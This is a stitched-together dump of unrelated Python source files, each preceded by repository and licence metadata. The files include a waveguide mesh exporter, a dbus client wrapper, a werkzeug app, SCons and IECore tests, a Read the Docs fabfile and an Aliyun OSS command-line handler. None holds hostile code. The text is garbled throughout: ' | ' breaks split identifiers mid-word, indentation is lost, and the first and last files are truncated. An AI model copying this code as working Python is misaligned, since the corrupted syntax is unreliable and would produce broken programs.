except ImportError:
import traceback
result = traceback.format_exc()
logging.error("Couldn't import jcmwave interface!")
logging.info("%s" % result)
#Run the rest of the configuration
Solve.__init__(self,wg)
def setup(self, geo_accuracy=1, refinement_levels=1, tol=1e-8, xy_domain=False):
self.wg_domain_xy = xy_domain
self.shape_refinement = geo_accuracy
self.wg_domain_refinement = 1
self.grid_refinements = refinement_levels
#Create wg file
self.create_materials_list()
self.export_wg(domainxy=self.wg_domain_xy)
#Create triangulation
self.export_triangulation(view=0)
#Clear mode list
self.modes = []
def create_materials_list(self):
#Start material list:
material_id = 1
#Add waveguide material, and internal and external materials
self.materials = {}
self.materials[self.wg.material] = material_id
#Also update zorder
self. | zorder_min = inf
for shape in self.wg.shapes:
if shape.material not in self.materials:
material_id += 1
self.materials[shape.material]= material_id
self.zorder_min = m | in(shape.zorder, self.zorder_min)
return self.materials
def export_wg(self, domainxy=False, sectors=None):
'''
Export the internal PolyMode waveguide shapes to a JCMSuite file
'''
if sectors is None:
sectors = self.wg.symmetry
pml_sf = 2.0
wglims = self.wg.extents(xy=domainxy)
if domainxy:
Cx = (wglims[1]+wglims[0])/2; Cy = (wglims[3]+wglims[2])/2
Dx = wglims[1]-wglims[0]; Dy = wglims[3]-wglims[2]
wg_domain_shape = "Parallelogram"
wg_domain_segment_labels = ["South", "West", "East", "North"]
wg_domain_size = "SideLengthA = %g\n SideLengthB = %g\n" % (Dx,Dy)
wg_domain_center = "GlobalPositionX = %g\n GlobalPositionY = %g\n" % (Cx,Cy)
pml_type = "NormalConstruction"
else:
wg_domain_shape = "Circle"
wg_domain_segment_labels = ["South", "West", "East", "North"]
wg_domain_size = "Radius = %g\n" % wglims[1]
wg_domain_center = "GlobalPositionX = %g\n GlobalPositionY = %g\n" % (0,0)
pml_type = "RadialConstruction"
wg_material_id = self.materials[self.wg.material]
quad_construction = \
""" QuadConstruction {
RadialScalingFactor = %g
QuadConstructionType = %s
MaterialId = %d
}""" % (pml_sf, pml_type, wg_material_id)
with open(os.path.join(self.path,self.layout_filename), "w") as jcmfile:
jcmfile.write("Layout {\n")
jcmfile.write(' Name = "Polymode Layout"\n')
jcmfile.write(" UnitOfLength = %e\n" % 1e-6)
#Computational domain
jcmfile.write(" %s {\n" % wg_domain_shape)
jcmfile.write(' Name = "Waveguide"\n')
jcmfile.write(" %s" % wg_domain_size)
jcmfile.write(" %s" % wg_domain_center)
jcmfile.write(" MaterialId = %d\n" % wg_material_id)
jcmfile.write(" Priority = -1\n")
jcmfile.write(" RefineAll = %d\n" % self.wg_domain_refinement)
for ii in range(4):
jcmfile.write(" BoundarySegment {\n")
jcmfile.write(" Segment = %s\n" % wg_domain_segment_labels[ii])
jcmfile.write(" BoundaryClass = TransparentBoundary\n")
jcmfile.write(" %s\n" % quad_construction)
jcmfile.write(" }\n")
jcmfile.write(" }\n")
#Save object for each shape
for ii,shape in enumerate(self.wg.shapes):
for kk in range(sectors):
krotate = kk*2*pi/self.wg.symmetry
#If shape overlaps the origin then don't copy it .. JCMgeo can complain
rmin,rmax,_,_ = shape.extents()
if rmin==0 and kk>0:
continue
#Rotated center
r0,phi0 = shape.get_center()
centerxy = array([r0*cos(phi0+krotate), r0*sin(phi0+krotate)])
if isinstance(shape, Waveguide.Circle):
jcmfile.write(" Circle {\n")
jcmfile.write(' Name = "Circle %d.%d"\n' % (ii,kk))
jcmfile.write(" Radius = %g\n" % shape.radius)
jcmfile.write(" RefineAll = %s\n" % self.shape_refinement)
elif isinstance(shape, Waveguide.Rectangle):
jcmfile.write(" Parallelogram {\n")
jcmfile.write(' Name = "Rectangle %d.%d"\n' % (ii,kk))
jcmfile.write(" SideLengthA = %g\n SideLengthB = %g\n" % shape.axes)
jcmfile.write(" RefineAll = %s\n" % self.shape_refinement)
elif isinstance(shape, Waveguide.Polygon):
jcmfile.write(" Polygon {\n")
jcmfile.write(' Name = "Polygon %d.%d"\n' % (ii,kk))
jcmfile.write(" Points = [\n")
xypoints = shape.to_nodelist(rotate=krotate)
#Ensure shapes are "open"
if xypoints[-1]==xypoints[0]:
xypoints=xypoints[:-1]
#Transform points - we should fix this to work in PolyMode itself
for xy in xypoints:
xy = array(xy)-centerxy
jcmfile.write(" %g %g\n" % tuple(xy))
jcmfile.write(" ]\n")
else:
print "Shape %s couldn't be converted" % shape
break
jcmfile.write(" GlobalPositionX = %g\n" % centerxy[0])
jcmfile.write(" GlobalPositionY = %g\n" % centerxy[1])
jcmfile.write(" MaterialId = %d\n" % self.materials[shape.material])
jcmfile.write(" Priority = %g\n" % (shape.zorder-self.zorder_min+1))
jcmfile.write(" }\n") #Close shape
jcmfile.write("}\n") #Close Layout
def export_materials(self, wl):
#Write materials:
with open(os.path.join(self.path,self.material_filename), "w") as jcmfile:
for mat in self.materials:
#Calulate permittivity at wavelength
eps = mat.index(wl)**2
jcmfile.write("Material {\n")
jc |
smattis/BET-1 | examples/parallel_and_serial_sampling/serial_serial.py | Python | gpl-3.0 | 927 | 0.001079 | # Copyright (C) 2016 The BET Development Team
# -*- coding: utf-8 -*-
# This demonstrates how to use BET in serial to sample a serial external model.
# run by calling "python serial_serial.py"
import os
import subprocess
import scipy.io as sio
import bet.sampling.basicSampling as bsam
def lb_model(inp | ut_data):
io_file_name = "io_file"
io_mdat = dict()
i | o_mdat['input'] = input_data
# save the input to file
sio.savemat(io_file_name, io_mdat)
# run the model
subprocess.call(['python', 'serial_model.py', io_file_name])
# read the output from file
io_mdat = sio.loadmat(io_file_name)
output_data = io_mdat['output']
return output_data
my_sampler = bsam.sampler(lb_model)
my_discretization = my_sampler.create_random_discretization(sample_type='r',
input_obj=4, savefile="serial_serial_example", num_samples=100)
|
mvidner/cnetworkmanager | dbusclient/__init__.py | Python | gpl-2.0 | 6,611 | 0.004084 | "Convenience wrappers around dbus-python"
import dbus
import functools
# TODO rename to adaptors
from func import Adaptor, MethodAdaptor, PropertyAdaptor, SignalAdaptor
def object_path(o):
"""Return the object path of o.
If o is a proxy object, use its appropriate attribute.
Otherwise assume that o already is an object path.
"""
if isinstance(o, dbus.proxies.ProxyObject):
return o.object_path
# hope it is ok
return o
class DBusMio(dbus.proxies.ProxyObject):
"""Multi-interface object.
Will look into introspection data to find which interface
to use for a method or a property, obviating the need for
dbus.proxies.Interface.
If introspection is not available, provide default_interface
to the constructor.
BUGS: 1st method call will block with introspection"""
API_OPTIONS = {
"byte_arrays": True,
"utf8_strings": True,
}
def __init__(self, conn=None, bus_name=None, object_path=None, introspect=True, follow_name_owner_changes=False, **kwargs):
"""Constructor.
kwargs may contain default_interface, to be used
if introspection does not provide it for a method/property
"""
# FIXME common for this class, all classes?
self.__default_interface = kwargs.pop("default_interface", None)
# print "OP:", object_path
super(DBusMio, self).__init__(conn, bus_name, object_path, introspect, follow_name_owner_changes, **kwargs)
def __getattr__(self, name):
"""Proxied DBus methods.
Uses introspection or default_interface to find the interface.
"""
# TODO cache
# iface = self._interface_cache.get(name)
# if iface == None:
iface = self.__default_interface
# _introspect_method_map comes from ProxyObject
# But it will be empty until the async introspection finishes
self._introspect_block() # FIXME makeit work with async methods
methods = self._introspect_method_map.keys()
for im in methods:
(i, m) = im.rsplit(".", 1)
if m == name:
iface = i
# print "METHOD %s INTERFACE %s" %(name, iface)
callable = super(DBusMio, self).__getattr__(name)
return functools.partial(callable, dbus_interface=iface, **DBusMio.API_OPTIONS)
# properties
def __getitem__(self, key):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
p = a["Prop"]
Uses default_interface (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
iface = self.__default_interface # TODO cache
# TODO _introspect_property_map
pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
return pmi.Get(iface, key, **DBusMio.API_OPTIONS)
def __setitem__(self, key, value):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
a["Prop"] = "Hello"
Uses default_interface | (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
iface = self.__default_interface # TODO cache
# TODO _introspect_property_map
pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
return pmi.Set(iface, key, value, **DBusMio.API_OPTIONS)
def _mklist(x):
| """Return a list.
Tuples are made into lists, everything else a singleton list.
"""
if isinstance(x, list):
return x
elif isinstance(x, tuple):
return [i for i in x]
else:
return [x]
class DBusClient(DBusMio):
"""
"""
_adaptors = {
"methods": {},
"signals": {},
"properties": {},
}
@classmethod
def _get_adaptor(cls, kind, name):
# print "GET", cls, kind, name
try:
a = cls._adaptors[kind][name]
# print ">", a
# TODO cache somehow?
return a
except KeyError:
scls = cls.__mro__[1] # can use "super"? how?
try:
return scls._get_adaptor(kind, name)
except AttributeError: # no _get_adaptor there
raise KeyError(":".join((kind, name)))
@classmethod
def _add_adaptor(cls, kind, name, adaptor):
# print "ADD", cls, kind, name, adaptor
assert(isinstance(adaptor, Adaptor))
cls._adaptors[kind][name] = adaptor
@classmethod
def _add_adaptors_dict(cls, andict):
"""
a nested dictionary of kind:name:adaptor,
"""
if not cls.__dict__.has_key("_adaptors"):
# do not use inherited attribute
cls._adaptors = {"methods":{}, "properties":{}, "signals":{}}
for section in cls._adaptors.keys():
secsource = andict.pop(section, {})
for name, adaptor in secsource.iteritems():
cls._add_adaptor(section, name, adaptor)
assert len(andict) == 0
# print "AA", cls, cls._adaptors
@classmethod
def _add_adaptors(cls, **kwargs):
"""kwargs: a *flat* dictionary of name: adaptor"""
adict = {"methods":{}, "properties":{}, "signals":{}}
for k, v in kwargs.iteritems():
kind = v.kind()
adict[kind][k] = v
cls._add_adaptors_dict(adict)
def __getattr__(self, name):
"Wrap return values"
callable = super(DBusClient, self).__getattr__(name)
try:
adaptor = self._get_adaptor("methods", name)
return adaptor.adapt(callable)
except KeyError:
return callable
# properties
def __getitem__(self, key):
value = super(DBusClient, self).__getitem__(key)
try:
adaptor = self._get_adaptor("properties", key)
return adaptor.adapt(value)
except KeyError:
return value
def __setitem__(self, key, value):
try:
adaptor = self._get_adaptor("properties", key)
value = adaptor.adapt_write(value)
except KeyError:
pass
return super(DBusClient, self).__setitem__(key, value)
# signals
# overrides a ProxyObject method
def _connect_to_signal(self, signame, handler, interface=None, **kwargs):
"Wrap signal handler, with arg adaptors"
# TODO also demarshal kwargs
adaptor = self._get_adaptor("signals", signame)
wrap_handler = adaptor.adapt(handler)
return self.connect_to_signal(signame, wrap_handler, interface, **kwargs)
|
RentennaDev/partial | partial/application.py | Python | mit | 1,463 | 0.004101 | from werkzeug.exceptions import HTTPException
from werkzeug.wsg | i import SharedDataMiddleware
from partial import routing, scanner
from partial.request import Request
class Application(object):
def dispatch_request(self, request):
scanner.LOCAL.request = request
adapter = scanner.GLOBAL['routemap'].bind_to_environ(request.environ)
try: endpoint, args = adapter.match()
except HTTPException as e: return e
(megamodule, clsName, methodName) = endpoint.split(".")
cls = scanner.getClass(megamodule, clsName)
| view = cls(request)
response = view.dispatch(methodName, args)
del scanner.LOCAL.request
return response
def wsgi_app(self, environ, start_response):
request = Request(environ)
response = self.dispatch_request(request)
request.session.save_cookie(response)
return response(environ, start_response)
def __call__(self, environ, start_response):
return self.wsgi_app(environ, start_response)
def createApp(serveStatic, megamodules=None):
scanner.scanRoutes(megamodules)
app = Application()
if serveStatic:
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {
'/resource': routing.resourcepath("")
})
return app
def runSimple(package):
scanner.scan(package, True)
app = createApp(True)
from werkzeug.serving import run_simple
run_simple('localhost', 4000, app) |
EmanueleCannizzaro/scons | test/WhereIs.py | Python | mit | 4,794 | 0.005632 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/WhereIs.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import os
import sys
import TestSCons
test = TestSCons.TestSCons()
subdir_SConscript = os.path.join('subdir', 'SConscript')
sub1_xxx_exe = test.workpath('sub1', 'xxx.exe')
sub2_xxx_exe = test.workpath('sub2', 'xxx.exe')
sub3_xxx_exe = test.workpath('sub3', 'xxx.exe')
sub4_xxx_exe = test.workpath('sub4', 'xxx.exe')
test.subdir('subdir', 'sub1', 'sub2', 'sub3', 'sub4')
if sys.platform != 'win32':
test.write(sub1_xxx_exe, "\n")
os.mkdir(sub2_xxx_exe)
test.write(sub3_xxx_exe, "\n")
os.chmod(sub3_xxx_exe, 0777)
test.write(sub4_xxx_exe, "\n")
os.chmod(sub4_xxx_exe, 0777)
env_path = os.environ['PATH']
pathdirs_1234 = [ test.workpath('sub1'),
test.workpath('sub2'),
test.workpath('sub3'),
test.workpath('sub4'),
] + env_path.split(os.pathsep)
pathdirs_1243 = [ test.workpath('sub1'),
test.workpath('sub2'),
test.workpath('sub4'),
test.workpath('sub3'),
] + env_path.split(os.pathsep)
test.write('SConstruct', """
SConscript('%s')
env = Environment()
print WhereIs('xxx.exe')
print WhereIs('xxx.exe', %s)
print env.WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s, reject=%s)
env.Replace( XXXNAME='xxx.exe' )
print env.WhereIs( '$XXXNAME', %s )
""" % (subdir_SConscript,
repr(os.pathsep.join(pathdirs_1234)),
repr(os.pathsep.join(pathdirs_1243)),
repr(pathdirs_1234),
repr(pathdirs_1243),
repr(pathdirs_1243),
repr(sub4_xxx_exe),
repr(os.pathsep.join(pathdirs_1243)),
))
t | est.wr | ite(subdir_SConscript, """
env = Environment()
print WhereIs('xxx.exe')
print WhereIs('xxx.exe', %s)
print env.WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
""" % (repr(os.pathsep.join(pathdirs_1234)),
repr(os.pathsep.join(pathdirs_1243)),
repr(pathdirs_1234),
repr(pathdirs_1243),
))
os.environ['PATH'] = os.pathsep.join(pathdirs_1234)
expect = [ test.workpath(sub3_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe)
]
test.run(arguments = ".",
stdout = test.wrap_stdout(read_str = "\n".join(expect) + "\n",
build_str = "scons: `.' is up to date.\n"))
os.environ['PATH'] = os.pathsep.join(pathdirs_1243)
expect = [ test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe)
]
test.run(arguments = ".",
stdout = test.wrap_stdout(read_str = "\n".join(expect) + "\n",
build_str = "scons: `.' is up to date.\n"))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
lento/cortex | test/IECore/IgnoredExceptionsTest.py | Python | bsd-3-clause | 2,674 | 0.032536 | ##########################################################################
#
# Copyright (c) 2010, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# | promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT S | HALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import IECore
class IgnoredExceptionsTest( unittest.TestCase ) :
def test( self ) :
def f( toRaise, toIgnore ) :
with IECore.IgnoredExceptions( toIgnore ) :
raise toRaise
self.assertRaises( RuntimeError, f, RuntimeError, KeyError )
self.assertRaises( RuntimeError, f, RuntimeError, ( KeyError, IndexError ) )
f( KeyError, KeyError )
f( KeyError, ( KeyError, IndexError ) )
f( IndexError, ( KeyError, IndexError ) )
c = IECore.CompoundObject()
with IECore.IgnoredExceptions( KeyError ) :
c["d"]
with IECore.IgnoredExceptions( Exception ) :
c["d"]
p = IECore.Parameterised( "" )
with IECore.IgnoredExceptions( Exception ) :
p["d"]
def testNoExceptions( self ) :
with IECore.IgnoredExceptions( Exception ) :
pass
if __name__ == "__main__":
unittest.main()
|
safwanrahman/readthedocs.org | fabfile.py | Python | mit | 979 | 0 | from fabric.api import lcd, local
from fabric.decorators import | runs_once
import os
fabfile_dir = os.path.dirname(__file__)
def i18n_push_source():
"""rebuild and push the source language to transifex"""
with lcd('readthedocs'):
local('rm -rf rtd_tests/tests/builds/')
local('django-admin makemes | sages -l en')
local('tx push -s')
local('django-admin compilemessages -l en')
def i18n_pull():
"""pull the updated translation from transifex"""
with lcd('readthedocs'):
local('rm -rf rtd_tests/tests/builds/')
local('tx pull -f ')
local('django-admin makemessages --all')
local('django-admin compilemessages')
def i18n_docs():
with lcd('docs'):
# Update our tanslations
local('tx pull -a')
local('sphinx-intl build')
# Push new ones
local('make gettext')
local('tx push -s')
@runs_once
def spider():
local('patu.py -d1 readthedocs.org')
|
alex-Symbroson/BotScript | BotScript/res/RaspiBot.py | Python | mit | 4,428 | 0.007453 | #!/usr/bin/python3.6
# initialized correctly
ISBOT = True
# object containing components
objs = {}
def warn(msg, type):
warnings.warn(msg, type)
try:
import warnings, raspibot, RPi.GPIO as GPIO
from serial import Serial, PARITY_EVEN
from smbus import SMBus
from time import sleep
# create components
objs = {
"Button1": raspibot.Button(13, 26, 23),
"Button2": raspibot.Button(19, 20, 24),
"Button3": raspibot.Button(16, 21, 25),
"Display": raspibot.Display(),
"ADC": raspibot.ADC(SMBus(1)),
"Attiny": raspibot.AttinyProtocol(Serial('/dev/ttyAMA0', 4800, 8, PARITY_EVEN, 2))
}
# initialize components
obj = objs["Display"]
# obj.clear()
obj.init()
obj.cursor_goto_xy(0, 0)
except ImportError as e:
ISBOT = False
warn("\n\033[1;33mraspibot module couldnt be loaded:\033[0;33m\n" + str(e) + "\033[0;37m", Warning)
# Methode available without botlib
class BaseMethods:
def cleanupGPIO(_):
for key in objs:
if hasattr(objs[key], "cleanup"): objs[key].cleanup()
GPIO.cleanup()
def isBot(_): return ISBOT
# remove values with greatest difference and calc arithmetic mean
def arith(_, values, remove=0):
arm = sum(values) / len(values)
# calc difference med <-> values
diff = [abs(val - arm) for val in values]
# remove elements with greatest difference
for _ in range(remove):
i = diff.index(max(diff))
values.pop(i)
diff.pop(i)
return sum(values) / len(values)
# arithmetic mean from 4 of 6 measured sensor values, one dummy measure
def getSensor(self, foo):
return self.arith([foo() for _ in range(7)][1:], 2)
if ISBOT:
class _Methods(BaseMethods):
def cleanup(self):
self.stopMotors()
self.stopBuzzer()
self.cleanupGPIO()
# Display
# writeLCD(test, x, y) = ("text", [0 - 15], [0 - 1])
def writeLCD(_, s, x = None, y = None):
if None not in (x, y):
objs["Display"].cursor_goto_xy(int(x), int(y))
objs["Display"].write(s)
# take defined functions if no conversion / args required
clearLCD = objs["Display"].clear # ()
# Serial (Attiny)
# setMotors(left right) = ([0 - 100], [0 - 100])
setMotors = objs["Attiny"].set_motors
# setBuzzer(frequency, duration , volume )
# ([0 - | 2^16], [0 - 2^16], [0 - 100])
setBuzzer = objs["Attiny"].set_buzzer
resetEncoders = objs["Attiny"].reset_encoders # ()
stopMotors = objs["Attiny"].stop_motors # ()
| stopBuzzer = objs["Attiny"].stop_buzzer # ()
# getEncoders -> [left, right] = ([0 - 100], [0 - 100])
def getEncoders(_, opt = None):
vals = objs["Attiny"].get_encoders()
if opt == "raw": return vals
return (vals[0]/22.5, vals[1]/22.5)
# ADC
def getSharp(self, i, opt = None): # i = ([1 - 2])
# read sensor value
d = self.getSensor(lambda : objs["ADC"].read_channel(3 - i))
if opt == "raw": return d
# convert data into cm
d /= 100 # less zeros in equation
if i == 1: d = (-d/2.065 + 9.62)*d*d - 65.3754*d + 159.2
if i == 2: d = (-d/11.56 + 2 )*d*d - 17 *d + 61.6
return int(d * 1000) / 1000 # 3 float digits
def getBattery(self): return self.getSharp(0, "raw")
# Buttons
# (i, v) = ([1 - 3], [0 - 100])
def setRedLED(_, i, v): objs["Button%i" % i].setRedLED(int(v))
def setGreenLED(_, i, v): objs["Button%i" % i].setGreenLED(int(v))
def waitForBtnPress(_, i): objs["Button%i" % i].waitForButtonPress()
def waitForBtnRelease(_, i): objs["Button%i" % i].waitForButtonRelease()
def waitForBtn(_, i): objs["Button%i" % i].waitForButton()
def isBtnPressed(_, i): return objs["Button%i" % i].isPressed()
else:
class _Methods(BaseMethods):
def cleanup(_): pass
Methods = _Methods()
# call method from Methods object
def callMethod(method, *args):
if hasattr(Methods, method):
return getattr(Methods, method)(*args)
else:
error = AssertionError("\033[0;31mmethod '%s' not found\033[0;37m" % method)
raise error
|
jkonecny12/anaconda | pyanaconda/payload/dnf/__init__.py | Python | gpl-2.0 | 1,037 | 0 | #
# Copyright (C) 2020 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject t | o the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.payload.dnf.payload import DNFPayload
| __all__ = ["DNFPayload"]
|
gplayersv/pypop | pypop/example/project_to_test/tests/pageobjects/login.py | Python | gpl-2.0 | 533 | 0 | import os
from s | elenium.webdriver.common.by import By
from pypop.pageobjects.base_page_object import PageObject
from pypop.pageobjects.base_page_element import InputField, PasswordField
class LoginPageObject(PageObject):
'''Page object for the login page'''
url = 'file:///' + os.path.dirname(__file__) + '/../../login.html'
username = InputField(By.ID, 'username')
password = PasswordField(By.ID, 'password')
| btn_login = InputField(By.ID, 'btn-login')
def go_to(self):
self.driver.get(self.url)
|
lufornpy/aliyun-cli | aliyuncli/ossadp/ossHandler.py | Python | apache-2.0 | 88,246 | 0.004657 | #!/usr/bin/env python
#coding=utf-8
# Copyright (C) 2011, Alibaba Cloud Computing
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from oss.oss_api import *
from oss.oss_util import *
from oss.oss_xml_handler import *
from aliyunCliParser import aliyunCliParser
import signal
import ConfigParser
from optparse import OptionParser
from optparse import Values
import os
import re
import time
import Queue
import sys
import socket
import shutil
reload(sys)
sys.setdefaultencoding("utf-8")
CMD_LIST = {}
HELP_CMD_LIST = ['--help','-h','help']
ACL_LIST = ['private', 'public-read', 'public-read-write']
OSS_PREFIX = 'oss://'
CONFIGFILE = "%s/.aliyuncli/osscredentials" % os.path.expanduser('~')
CONFIGSECTION = 'OSSCredentials'
DEFAUL_HOST = "oss.aliyuncs.com"
OSS_HOST = DEFAUL_HOST
ID = ""
KEY = ""
STS_TOKEN = None
TOTAL_PUT = AtomicInt()
PUT_OK = AtomicInt()
PUT_FAIL = AtomicInt()
PUT_SKIP = AtomicInt()
FILE_NUM_TOTAL = AtomicInt()
FILE_NUM_OK = AtomicInt()
GET_OK = AtomicInt()
GET_FAIL = AtomicInt()
GET_SKIP = AtomicInt()
DELETE_OK = AtomicInt()
COPY_OK = AtomicInt()
SEND_BUF_SIZE = 8192
RECV_BUF_SIZE = 1024*1024*10
MAX_OBJECT_SIZE = 5*1024*1024*1024
MAX_RETRY_TIMES = 3
IS_DEBUG = False
ERROR_FILE_LIST = []
AUTO_DUMP_FILE_NUM = 50
RET_OK = 0
RET_FAIL = -1
RET_SKIP = 1
lock = threading.Lock()
HELP = \
'''The valid command as follows::
GetAllBucket
CreateBucket oss://bucket --acl [acl] --location [location]
DeleteBucket oss://bucket
DeleteWholeBucket oss://bucket
GetBucketLocation oss://bucket
PutBucketCors oss://bucket localfile
GetBucketCors oss://bucket
DeleteBucketCors oss://bucket
PutBucketLogging oss://source_bucket oss://target_bucket/[prefix]
GetBucketLogging oss://bucket
DeleteBucketLogging oss://bucket
PutBucketWebsite oss://bucket indexfile [errorfile]
GetBucketWebsite oss://bucket
DeleteBucketWebsite oss://bucket
PutBucketLifeCycle oss://bucket localfile
GetBucketLifeCycle oss://bucket
DeleteBucketLifeCycle oss://bucket
PutBucketReferer oss://buc | ket --allow_empty_referer true --referer "referer1,referer2,...,refererN"
GetBucketReferer oss://bucket
GetAcl oss://bucket
SetAcl oss://bucket -- | acl [acl]
allow private, public-read, public-read-write
List oss://bucket/[prefix] [marker] [delimiter] [maxkeys]
oss://bucket/[prefix] --marker xxx --delimiter xxx --maxkeys xxx
MkDir oss://bucket/dirname
ListAllObject oss://bucket/[prefix]
ListAllDir oss://bucket/[prefix]
DeleteAllObject oss://bucket/[prefix] --force false
DownloadAllObject oss://bucket/[prefix] localdir --replace false --thread_num 5
DownloadToDir oss://bucket/[prefix] localdir --replace false --temp_dir xxx --thread_num 5
UploadObjectFromLocalDir localdir oss://bucket/[prefix] --check_point check_point_file --replace false --check_md5 false --thread_num 5
Put oss://bucket/object --content_type [content_type] --headers \"key1:value1#key2:value2\" --check_md5 false
Get oss://bucket/object localfile
MultiGet oss://bucket/object localfile --thread_num 5
Cat oss://bucket/object
Meta oss://bucket/object
Info oss://bucket/object
Copy oss://source_bucket/source_object oss://target_bucket/target_object --headers \"key1:value1#key2:value2\"
CopyLargeFile oss://source_bucket/source_object oss://target_bucket/target_object --part_size 10*1024*1024 --upload_id xxx
CopyBucket oss://source_bucket/[prefix] oss://target_bucket/[prefix] --headers \"key1:value1\" --replace false
Delete oss://bucket/object
SignUrl oss://bucket/object --timeout [timeout_seconds]
CreateLinkFromFile oss://bucket/object object_name_list_file
CreateLink oss://bucket/object object1 object2 ... objectN
GetLinkIndex oss://bucket/object
Options oss://bucket/[object] --origin xxx --method [GET, PUT, DELETE, HEAD, POST]
UploadDisk localdir oss://bucket/[prefix] [--check_point check_point_file --filename filename_file --replace false --content_type xxx --skip_dir false --skip_suffix false --out xxx] --device_id xxx --check_md5 false
Init oss://bucket/object
ListPart oss://bucket/object --upload_id xxx
ListParts oss://bucket
GetAllPartSize oss://bucket
